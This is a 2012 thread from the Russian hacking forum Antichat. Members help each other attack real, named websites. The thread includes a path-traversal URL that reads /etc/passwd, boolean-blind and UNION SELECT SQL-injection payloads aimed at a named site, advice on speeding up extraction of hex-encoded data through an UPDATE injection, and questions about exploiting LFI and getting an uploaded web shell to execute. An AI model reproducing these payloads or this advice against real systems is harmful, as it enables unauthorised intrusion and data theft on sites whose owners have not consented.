ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
15.11.2012, 16:55
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Сообщение от aadktnbaov
P.S. учи "мат. часть"
Я спрашивал - Как наиболее эффективно ей воспользоваться.
А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.
Пока делаю по своему, вытягиваю по несколько символов за раз.
|
|
|
15.11.2012, 19:12
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
Провел на форуме:
178623
Репутация:
94
|
|
Вопрос по LFI.
Сообщение от None
http://www.epoka.edu.al/new/index.php?p=
Ну вот qaz пытался мне помочь, но не смог.
Помогите выжать максимум из LFI, не получается. |
|
|
|
15.11.2012, 19:53
|
|
Новичок
Регистрация: 06.06.2011
Сообщений: 14
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от IMMORTAL_S
Я спрашивал - Как
наиболее эффективно
ей воспользоваться.
А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.
Пока делаю по своему, вытягиваю по несколько символов за раз.
BLIND-ануть - это значит применить sql-инъекцию "вслепую"
без вывода резьтата куда-либо в явном виде
см. перевод англ. слова "BLIND"
чаще всего подразумевает под собой применение инъекции с двояким резьтатом её исполнения ( true , false значение )
например, результат инъекции может быть либо "нормальной" страницей , либо пустой страницей
с помощью такой "слепой" инъекции можно методом "тупого" ПЕРЕБОРА (ну или "умного", если хорошо понимаешь , какие именно данные хочешь извлечь и как оптимизировать этот самый "тупой" подбор ) вытянуть нужные данные из базы
В Вашем же случае инъекция ни разу не BLIND
данные в базе Вы изменяете с помощью update-инъекции и затем можете увидеть изменения в явном виде
HEX-хуекс или BASE64 вместо желанного plain text - это уже не важно
из Вашего HEX-a даныне легко преобразовать к оригиналу (желанному plain text ).
|
|
|
|
15.11.2012, 20:08
|
|
Новичок
Регистрация: 06.06.2011
Сообщений: 14
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от IMMORTAL_S
Я спрашивал - Как
наиболее эффективно
ей воспользоваться.
могу посоветовать оптимизировать вытягивание даныне Вашим replace-ом
но не так
001 , 002 , 003 , 004, 005 , 006
вместо
a , b , с , d , e , f
а так
01 , 02 , 03, 04 , 05 , 06
вместо
a , b , с , d , e , f
врядли в изначальной строке будут символы с ascii-кодами , начинающимися на 0 в хексе
т.е. строка hex('admin') = 61646 D696 E
в вашем случае преобразуется в 61646 04696 05
далее проанализировав по четности месторасположения нуля в строке , нетрудно понять где именно менялись буквенные символы хекса
|
|
|
|
16.11.2012, 02:30
|
|
Новичок
Регистрация: 23.12.2008
Сообщений: 8
Провел на форуме:
49727
Репутация:
0
|
|
Как можно реализовать FTP-соединение на шелле? Подскажите несложные способы или дайте ссылки, где есть мануалы по этому, буду очень благодарен.
|
|
|
|
16.11.2012, 03:16
|
|
Новичок
Регистрация: 06.10.2012
Сообщений: 13
Провел на форуме:
2855
Репутация:
0
|
|
Код:
http://www.basegroup.su/index.php?Page=../../../../../etc/passwd
в частности, есть какая либо утилита-скрипт которая приводит в читабельный вид файл passwd? спрашиваю чисто из-за любопытсва и на будущее. паролей то там нет как я понимаю? в даном случае используются shadow пароли?но получить доступк /etc/shadow на данном ресурсе при помощи LFI не представляется возможным.вобще какой толк от этого файла, если только это не какая то экзотическая рухлядь, где пароли ещё не вынесены из passwd? |
|
|
|
16.11.2012, 03:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
rooting -> cat /etc/passwd --> ftp connecting.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
16.11.2012, 12:00
|
|
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
Провел на форуме:
74477
Репутация:
21
|
|
не получается залить шелл,т.е. я могу лить любые форматы,но они не работают как пхп,а открываются txt, как можно залиться?
|
|
|
|
16.11.2012, 17:16
|
|
Новичок
Регистрация: 23.12.2008
Сообщений: 8
Провел на форуме:
49727
Репутация:
0
|
|
Сообщение от shell_c0de
rooting -> cat /etc/passwd --> ftp connecting.
" passwd" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?
|
|
|
|
16.11.2012, 17:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от p1oneer
"
passwd
" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?
это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?
Сообщение от intertrey
хм
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а у строковых также?
http://0214.by/catalog.php?id=130' AnD '1 ИСТИНА
http://0214.by/catalog.php?id=130' AnD '0 ЛОЖЬ
Это как аналоги сравнения для:
http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon ИСТИНА
http://0214.by/catalog.php?id=130' AnD 'hexon'>'hexjector ЛОЖЬ
Равнозначны или не?)
http://0214.by/catalog.php?id=130+and+0+union+select+1,version(), 3,4,5,6,7,8,9,10--+
внимательнее. смотри в тайтл
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
